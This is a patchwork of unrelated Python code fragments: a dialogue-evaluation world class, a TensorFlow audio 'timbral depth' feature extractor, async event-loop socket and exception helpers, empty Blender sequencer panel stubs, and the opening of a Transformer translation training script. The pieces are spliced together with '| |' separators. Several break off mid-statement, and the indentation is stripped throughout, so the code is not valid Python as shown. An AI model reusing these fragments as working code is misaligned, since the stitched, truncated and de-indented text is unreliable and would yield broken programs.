self.bot_seen_persona = False
self.personas = [ag.personas for ag in self.agents]
if self.model_agent is not None:
self.eval_agent = self.agents[0]
self.model_personas = self.agents[0].model_personas
self.model_persona_text = '\n'.join(
['your persona: ' + pers for pers in self.model_personas]
)
else:
self.model_personas = None
for idx in range(len(self.agents)):
if self.agents[idx].id == 'PERSON_1':
self.eval_agent = self.agents[idx]
self.other_agent = self.agents[idx - 1]
break
def get_control_msg(self):
return {'id': 'SYSTEM', 'episode_done': False}
def get_human_agent_act(self, agent):
act = agent.act(timeout=self.max_resp_time)
while self.is_msg_tooshortlong(act, agent):
act = agent.act(timeout=self.max_resp_time)
return act
def format_model_reply(self, text):
switch_list = [(' .', '.'), (' ,', ','), (' ?', '?'), (' !', '!'), (" ' ", "'")]
# add spaces before punctuation so human text matches the model's tokenization
new_text = text.lower()
# normalize in case of human:
for new, old in switch_list:
new_text = new_text.replace(old, new).replace(' | |
array, this is required to be the sample rate.
Defaults to 0.
:param phase_correction: bool, perform phase checking before summing to mono. Defaults to False.
:param dev_output: bool, when False return the depth, when True return all extracted
features. Default to False.
:param threshold_db: float/int (negative), threshold, in dB, for calculating centroids.
Should be negative. Defaults to -60.
:param low_frequency_limit: float/int, low frequency limit at which to highpass filter the audio, in Hz.
Defaults to 20.
:param centroid_crossover_frequency: float/int, crossover frequency for calculating the spectral centroid, in Hz.
Defaults to 2000
:param ratio_crossover_frequency: float/int, crossover frequency for calculating the ratio, in Hz.
Defaults to 500.
:param db_decay_threshold: float/int (negative), threshold, in dB, for estimating duration. Should be
negative. Defaults to -40.
:return: float, apparent depth of the audio file.
Copyright 2018 <NAME>, Institute of Sound Recording, University of Surrey, UK.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
'''
Read input
'''
assert len(audio_tensor.get_shape().as_list(
)) == 3, "tf_timbral_depth :: audio_tensor should be of rank 2 or 3, got {}".format(audio_tensor)
audio_samples, fs = audio_tensor[:, :, 0], fs
b, n = audio_samples.get_shape().as_list()
# audio_samples is now of format BN
fs = float(fs)
'''
Filter audio
'''
max_val = 1.0 / K.max(K.abs(audio_samples), axis=-1, keepdims=True)
# highpass audio - run 3 times to get -18dB per octave - unstable filters produced when using a 6th order
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
audio_samples = timbral_util.tf_filter_audio_highpass(
audio_samples, crossover=low_frequency_limit, fs=fs)
# running 3 times to get a -18dB per octave rolloff; filters of order greater than two are unstable in python
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_centroid_audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_centroid_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_centroid_audio_samples, crossover=centroid_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
audio_samples, crossover=ratio_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_ratio_audio_samples, crossover=ratio_crossover_frequency, fs=fs)
lowpass_ratio_audio_samples = timbral_util.tf_filter_audio_lowpass(
lowpass_ratio_audio_samples, crossover=ratio_crossover_frequency, fs=fs)
'''
Get spectrograms and normalise
'''
# normalise audio
max_val = 1.0 / K.max(K.abs(audio_samples), axis=-1, keepdims=True)
lowpass_ratio_audio_samples = max_val * lowpass_ratio_audio_samples
lowpass_centroid_audio_samples = max_val*lowpass_centroid_audio_samples
audio_samples = max_val * audio_samples
# set FFT parameters
nfft = 4096
hop_size = int(3*nfft / 4)
# get spectrogram
nn = len(audio_samples[0])
nn_lp = len(lowpass_centroid_audio_samples[0])
nn_lpr = len(lowpass_ratio_audio_samples[0])
if nn > nfft:
freq, time, spec = timbral_util.compat_spectrogram(
audio_samples, fs,
'hamming', nfft, hop_size, nfft,
False, True, 'spectrum')
lp_centroid_freq, lp_centroid_time, lp_centroid_spec = timbral_util.compat_spectrogram(lowpass_centroid_audio_samples, fs,
'hamming', nfft, hop_size, nfft,
False, True, 'spectrum')
_, _, lp_ratio_spec = timbral_util.compat_spectrogram(lowpass_ratio_audio_samples, fs, 'hamming', nfft,
hop_size, nfft, False, True, 'spectrum')
else:
# file is shorter than 4096, just take the fft
print("Hello problem :!")
freq, _, spec = timbral_util.compat_spectrogram(audio_samples, fs, 'hamming', nn, nn-1,
nfft, False, True, 'spectrum')
lp_centroid_freq, _, lp_centroid_spec = timbral_util.compat_spectrogram(lowpass_centroid_audio_samples, fs,
'hamming',
nn_lp,
nn_lp-1,
nfft, False, True, 'spectrum')
_, _, lp_ratio_spec = timbral_util.compat_spectrogram(lowpass_ratio_audio_samples, fs, 'hamming',
nn_lpr,
nn_lpr-1,
nfft, False, True, 'spectrum')
threshold = timbral_util.db2mag(threshold_db)
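# Assumption about timbral_util.db2mag: it converts a dB level to linear
# magnitude, i.e. db2mag(x) = 10.0**(x/20.0), so threshold_db = -60 yields a
# magnitude threshold of 1e-3.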
# NOTE :: compat_spectrogram may need to be transposed compared to scipy's spectrogram;
'''
METRIC 1 - limited weighted mean normalised lower centroid
'''
all_normalised_centroid_tpower = []
all_normalised_lower_centroid = []
# get metrics for each time segment of the spectrogram
# TODO :: verify that this vectorised form matches the original per-frame loop.
all_normalised_lower_centroid = K.sum(
lp_centroid_freq * lp_centroid_spec, axis=[2]) / K.sum(lp_centroid_spec, axis=2)
all_normalised_centroid_tpower = K.sum(spec, axis=-1)
all_normalised_lower_centroid = tf.where(tf.math.greater(
all_normalised_centroid_tpower, threshold), all_normalised_lower_centroid, 0.)
# calculate the weighted mean of lower centroids
"""
weighted_mean_normalised_lower_centroid = np.average(all_normalised_lower_centroid,
weights=all_normalised_centroid_tpower)
all_normalised_lower_centroid = tf.stack(
all_normalised_lower_centroid_array)
"""
weighted_mean_normalised_lower_centroid = timbral_util.tf_average(
all_normalised_lower_centroid, all_normalised_centroid_tpower, epsilon=None)
# limit to the centroid crossover frequency
"""
if weighted_mean_normalised_lower_centroid > centroid_crossover_frequency:
limited_weighted_mean_normalised_lower_centroid = np.float64(
centroid_crossover_frequency)
else:
limited_weighted_mean_normalised_lower_centroid = weighted_mean_normalised_lower_centroid
"""
limited_weighted_mean_normalised_lower_centroid = K.clip(
weighted_mean_normalised_lower_centroid, 0., centroid_crossover_frequency)
# TODO :: convert below.
'''
METRIC 2 - weighted mean normalised lower ratio
'''
# define arrays for storing metrics
all_normalised_ratio_tpower = K.sum(spec, axis=2)
lower_power = K.sum(lp_ratio_spec, axis=2)
all_normalised_lower_ratio = tf.where(tf.math.greater(
all_normalised_ratio_tpower, threshold), lower_power/all_normalised_ratio_tpower, 0.)
# calculate
weighted_mean_normalised_lower_ratio = timbral_util.tf_average(
all_normalised_lower_ratio, all_normalised_ratio_tpower, epsilon=None)
'''
METRIC 3 - Approximate duration/decay-time of sample
'''
"""
TODO :: discrepancy from the original implementation to investigate!
Original ::
all_my_duration = []
# get envelope of signal
envelope = timbral_util.sample_and_hold_envelope_calculation(
audio_samples, fs)
# estimate onsets
onsets = timbral_util.calculate_onsets(audio_samples, envelope, fs)
# get RMS envelope - better follows decays than the sample-and-hold
rms_step_size = 256
rms_envelope = timbral_util.calculate_rms_enveope(
audio_samples, step_size=rms_step_size)
# convert decay threshold to magnitude
decay_threshold = timbral_util.db2mag(db_decay_threshold)
# rescale onsets to rms stepsize - casting to int
time_convert = fs / float(rms_step_size)
onsets = (np.array(onsets) / float(rms_step_size)).astype('int')
onsets = [0]
for idx, onset in enumerate(onsets):
# NOTE :: simplification
segment = rms_envelope
# get location of max RMS frame
max_idx = np.argmax(segment)
# get the segment from this max until the next onset
post_max_segment = segment[max_idx:]
# estimate duration based on decay or until next onset
if min(post_max_segment) >= decay_threshold:
my_duration = len(post_max_segment) / time_convert
else:
my_duration = np.where(post_max_segment < decay_threshold)[
0][0] / time_convert
# append to array
all_my_duration.append(my_duration)
# calculate the lof of mean duration
mean_my_duration = np.log10(np.mean(all_my_duration))
"""
onsets = b * [0]
all_my_duration_array = []
decay_threshold = timbral_util.db2mag(db_decay_threshold)
for i in range(b):
all_my_duration = []
# get RMS envelope - better follows decays than the sample-and-hold
rms_step_size = 256
segment = tf.numpy_function(
timbral_util.calculate_rms_enveope, [audio_samples[i], rms_step_size, 256, True], [audio_samples.dtype], name='tf_rms_envelope')
# rms_envelope is float64
# convert decay threshold to magnitude
# rescale onsets to rms stepsize - casting to int
time_convert = fs / float(rms_step_size)
# onsets = (np.array(onsets) / float(rms_step_size)).astype('int')
# assumes there is only one onset
# onset = 0, idx = 0
# segment = np.array(rms_envelope)
# get location of max RMS frame
max_idx = np.argmax(segment)
# get the segment from this max until the next onset
post_max_segment = segment[max_idx:]
# estimate duration based on decay or until next onset
# my_duration = len(post_max_segment) / time_convert
# my_duration = len(post_max_segment) / time_convert
shape = tf.cast(K.sum(tf.shape(post_max_segment)), audio_samples.dtype)
# TODO :: find efficient way to make this condition work
my_duration = shape / time_convert
"""
if min(post_max_segment) >= decay_threshold:
my_duration = len(post_max_segment) / time_convert
else:
my_duration = np.where(post_max_segment < decay_threshold)[
0][0] / time_convert
"""
# append to array
all_my_duration.append(my_duration)
all_my_duration_array.append(all_my_duration)
all_my_duration = tf.cast(
tf.stack(all_my_duration_array), audio_samples.dtype)
# calculate the lof of mean duration
mean_my_duration = timbral_util.tf_log10(
K.mean(all_my_duration, axis=-1))
'''
METRIC 4 - f0 estimation with peak picking
# Original
all_spectrum = np.sum(spec, axis=1)
# normalise this
norm_spec = (all_spectrum - np.min(all_spectrum)) / \
(np.max(all_spectrum) - np.min(all_spectrum))
# set limit for peak picking
cthr = 0.01
# detect peaks
peak_idx, peak_value, peak_freq = timbral_util.detect_peaks(norm_spec, cthr=cthr, unprocessed_array=norm_spec,
freq=freq)
# estimate peak
pitch_estimate = np.log10(min(peak_freq)) if peak_freq[0] > 0 else 0
'''
# get the overall spectrum
all_spectrum = K.sum(spec, axis=1) # norm_spec ::(1,2049)
# normalise this
"""
norm_spec:: (2049)
norm_spec = (all_spectrum - np.min(all_spectrum)) / \
(np.max(all_spectrum) - np.min(all_spectrum))
"""
b_norm = K.max(all_spectrum, axis=-1, keepdims=True) - \
K.min(all_spectrum, axis=-1, keepdims=True)
norm_spec = (all_spectrum - K.min(all_spectrum,
axis=-1, keepdims=True)) / b_norm
# set limit for peak picking
cthr = 0.01
"""
peak_idx, _, peak_x = tf.numpy_function(timbral_util.detect_peaks, [
spec, freq, 0.2, spec, fs], [tf.int64, tf.float64, tf.float64])
(array, freq=0, cthr=0.2, unprocessed_array=False, fs=44100):
"""
# detect peaks
pitch_estimate_array = []
for i in range(b):
_, _, peak_freq = tf.numpy_function(
timbral_util.detect_peaks, [norm_spec[i], freq, cthr, norm_spec[i], fs], [tf.int64, tf.float64, tf.float64], name='detect_peaks')
# estimate peak
if peak_freq[0] > 0:
pitch_estimate = timbral_util.tf_log10(
K.min(peak_freq), peak_freq.dtype)
else:
pitch_estimate = tf.cast(0, peak_freq.dtype)
pitch_estimate_array.append(
tf.cast(pitch_estimate, audio_samples.dtype))
pitch_estimate = tf.stack(pitch_estimate_array)
# get outputs
if dev_output:
return limited_weighted_mean_normalised_lower_centroid, weighted_mean_normalised_lower_ratio, mean_my_duration, \
pitch_estimate, weighted_mean_normalised_lower_ratio * mean_my_duration, \
timbral_util.sigmoid(
weighted_mean_normalised_lower_ratio) * mean_my_duration
else:
'''
Perform linear regression to obtain depth
'''
# coefficients from linear regression
# | |
before : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream` = `None`, Optional
The file to print the stack to. Defaults to `sys.stderr`.
Returns
-------
future : ``Future``
Returns a future, what can be awaited to wait for the rendering to be done.
""")
if DOCS_ENABLED:
render_exception_maybe_async.__doc__ = (
"""
Renders the given exception's traceback. If called from an ``EventThread``, then will not block it.
This method is called from function or methods, where being on an ``EventThread`` is not guaranteed.
Parameters
----------
exception : ``BaseException``
The exception to render.
before : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream` = `None`, Optional
The file to print the stack to. Defaults to `sys.stderr`.
""")
@staticmethod
def _render_exception_sync(exception, before, after, file):
"""
Renders the given exception in a blocking way.
Parameters
----------
exception : ``BaseException``
The exception to render.
before : `str`, `list` of `str`
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `str`, `list` of `str`
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream`
The file to print the stack to. Defaults to `sys.stderr`.
"""
extracted = []
if before is None:
pass
elif isinstance(before, str):
extracted.append(before)
elif isinstance(before, list):
for element in before:
if type(element) is str:
extracted.append(element)
else:
extracted.append(repr(element))
extracted.append('\n')
else:
# ignore exception cases
extracted.append(repr(before))
extracted.append('\n')
render_exception_into(exception, extend=extracted)
if after is None:
pass
elif isinstance(after, str):
extracted.append(after)
elif isinstance(after, list):
for element in after:
if type(element) is str:
extracted.append(element)
else:
extracted.append(repr(element))
extracted.append('\n')
else:
extracted.append(repr(after))
extracted.append('\n')
if file is None:
# ignore exception cases
file = sys.stderr
file.write(''.join(extracted))
def stop(self):
"""
Stops the event loop. Thread safe.
"""
if self.should_run:
if current_thread() is self:
self._stop()
else:
self.call_soon(self._stop)
self.wake_up()
def _stop(self):
"""
Stops the event loop. Internal function of ``.stop``, called or queued up by it.
Should be called only from the thread of the event loop.
"""
self.release_executors()
self.should_run = False
async def shutdown_async_generators(self):
"""
Shuts down the asynchronous generators running on the event loop.
This method is a coroutine.
"""
self._async_generators_shutdown_called = True
async_generators = self._async_generators
if not async_generators:
return
closing_async_generators = list(async_generators)
async_generators.clear()
results = await Gatherer(self, (ag.aclose() for ag in closing_async_generators))
for result, async_generator in zip(results, closing_async_generators):
exception = result.exception
if (exception is not None) and (type(exception) is not CancelledError):
extracted = [
'Exception occurred during shutting down async generator:\n',
repr(async_generator),
]
render_exception_into(exception, extend=extracted)
sys.stderr.write(''.join(extracted))
def get_tasks(self):
"""
Collects all the scheduled tasks and returns them.
Returns
-------
tasks : `list` of ``Task``
"""
future_checks_pending = set()
# Collect all futures
task = self.current_task
if (task is not None):
future_checks_pending.add(task)
for handle in chain(self._ready, self._scheduled):
func = handle.func
if isinstance(func, MethodType):
maybe_future = func.__self__
if isinstance(maybe_future, Future):
future_checks_pending.add(maybe_future)
elif isinstance(func, Future):
future_checks_pending.add(func)
args = handle.args
if (args is not None):
for parameter in args:
if isinstance(parameter, MethodType):
maybe_future = parameter.__self__
if isinstance(maybe_future, Future):
future_checks_pending.add(maybe_future)
elif isinstance(parameter, Future):
future_checks_pending.add(parameter)
# Check callbacks
future_checks_done = set()
while future_checks_pending:
future = future_checks_pending.pop()
future_checks_done.add(future)
for callback in future._callbacks:
if isinstance(callback, MethodType):
maybe_future = callback.__self__
if isinstance(maybe_future, Future):
if (maybe_future not in future_checks_done):
future_checks_pending.add(maybe_future)
elif isinstance(callback, Future):
if (callback not in future_checks_done):
future_checks_pending.add(callback)
# select tasks
return [future for future in future_checks_done if isinstance(future, Task)]
def _make_socket_transport(self, socket, protocol, waiter=None, *, extra=None, server=None):
"""
Creates a socket transport with the given parameters.
Parameters
----------
socket : `socket.socket`
The socket, what the transport will use.
protocol : ``AbstractProtocolBase``
The protocol of the transport.
waiter : `None`, ``Future`` = `None`, Optional
Waiter, what's result should be set, when the transport is ready to use.
extra : `None`, `dict` of (`str`, `Any`) item = `None`, Optional (Keyword only)
Optional transport information.
server : `None`, ``Server`` = `None`, Optional (Keyword only)
The server to what the created socket will be attached to.
Returns
-------
transport : ``SocketTransportLayer``
"""
return SocketTransportLayer(self, extra, socket, protocol, waiter, server)
def _make_ssl_transport(self, socket, protocol, ssl, waiter=None, *, server_side=False, server_host_name=None,
extra=None, server=None):
"""
Creates an ssl transport with the given parameters.
Parameters
----------
socket : `socket.socket`
The socket, what the transport will use.
protocol : ``AbstractProtocolBase``
Asynchronous protocol implementation for the transport. The given protocol is wrapped into an
``SSLBidirectionalTransportLayer``
ssl : `SSLContext`
Ssl context of the respective connection.
waiter : `None`, ``Future`` = `None`, Optional
Waiter, what's result should be set, when the transport is ready to use.
server_side : `bool` = `False`, Optional (Keyword only)
Whether the created ssl transport is a server side.
server_host_name : `None`, `str` = `None`, Optional (Keyword only)
Overwrites the hostname that the target server’s certificate will be matched against.
By default the value of the host parameter is used. If host is empty, there is no default and you must pass
a value for `server_host_name`. If `server_host_name` is an empty string, hostname matching is disabled
(which is a serious security risk, allowing for potential man-in-the-middle attacks).
extra : `None`, `dict` of (`str`, `Any`) items = `None`, Optional (Keyword only)
Optional transport information.
server : `None`, ``Server`` = `None`, Optional (Keyword only)
The server to what the created socket will be attached to.
Returns
-------
transport : ``SSLBidirectionalTransportLayerTransport``
The created ssl transport.
"""
ssl_transport = SSLBidirectionalTransportLayer(self, protocol, ssl, waiter, server_side, server_host_name, True)
SocketTransportLayer(self, extra, socket, ssl_transport, None, server)
return ssl_transport
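# Design note: the user protocol is wrapped by the ssl layer, and the ssl layer
# (not the protocol) is handed to the socket transport, so incoming bytes flow
# socket -> SSLBidirectionalTransportLayer -> protocol, while the caller gets
# back the ssl-side transport.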
def empty_self_socket(self):
"""
Reads all the data out from self socket.
Familiar to async-io event loop's `._read_from_self`.
"""
while True:
try:
data = self._self_read_socket.recv(4096)
if not data:
break
except InterruptedError:
continue
except BlockingIOError:
break
def wake_up(self):
"""
Wakes up the event loop. Thread safe.
Familiar as async-io event loop's `._write_to_self`.
"""
self_write_socket = self._self_write_socket
if self_write_socket is None:
if self.running:
return
# If we start it, waking up is not needed. If we don't start it, we won't wake up anyway.
self._maybe_start()
return
try:
self_write_socket.send(b'\0')
except OSError:
pass
def _start_serving(self, protocol_factory, socket, ssl, server, backlog):
"""
Starts serving the given socket on the event loop. Called by ``Server.start``. Adds a reader callback for the
socket, what will call ``._accept_connection``. (At edge cases ``._accept_connection`` might call this
method as well for repeating itself after a delay.)
Parameters
----------
protocol_factory : `callable`
Factory function for creating an asynchronous compatible protocol.
socket : `socket.socket`
The sockets to serve by the respective server if applicable.
ssl : `None`, `SSLContext`
To enable ssl for the connections, give it as `SSLContext`.
server : `None`, ``Server``
The respective server, what started to serve if applicable.
backlog : `int`
The maximum number of queued | |
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_comp(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_crop(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_sound(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_transform(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_video(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_cache_settings(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train and evaluate the Transformer model.
See README for description of setting the training schedule and evaluating the
BLEU score.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
from tensorflow.python.util import object_identity
# pylint: disable=g-bad-import-order
from official.transformer import compute_bleu
from official.transformer.utils import tokenizer
from official.transformer.v2 import data_pipeline
from official.transformer.v2 import metrics
from official.transformer.v2 import misc
from official.transformer.v2 import optimizer
from official.transformer.v2 import transformer
from official.transformer.v2 import translate
from official.utils.flags import core as flags_core
from official.utils.logs import logger
from official.utils.misc import keras_utils
from official.utils.misc import distribution_utils
INF = int(1e9)
BLEU_DIR = "bleu"
_SINGLE_SAMPLE = 1
def translate_and_compute_bleu(model,
params,
subtokenizer,
bleu_source,
bleu_ref,
distribution_strategy=None):
"""Translate file and report the cased and uncased bleu scores.
Args:
model: A Keras model, used to generate the translations.
params: A dictionary, containing the translation related parameters.
subtokenizer: A subtokenizer object, used for encoding and decoding source
and translated lines.
bleu_source: A file containing source sentences for translation.
bleu_ref: A file containing the reference for the translated sentences.
distribution_strategy: A platform distribution strategy, used for TPU based
translation.
Returns:
uncased_score: A float, the case insensitive BLEU score.
cased_score: A float, the case sensitive BLEU score.
"""
# Create temporary file to store translation.
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp_filename = tmp.name
translate.translate_file(
model,
params,
subtokenizer,
bleu_source,
output_file=tmp_filename,
print_all_translations=False,
distribution_strategy=distribution_strategy)
# Compute uncased and cased bleu scores.
uncased_score = compute_bleu.bleu_wrapper(bleu_ref, tmp_filename, False)
cased_score = compute_bleu.bleu_wrapper(bleu_ref, tmp_filename, True)
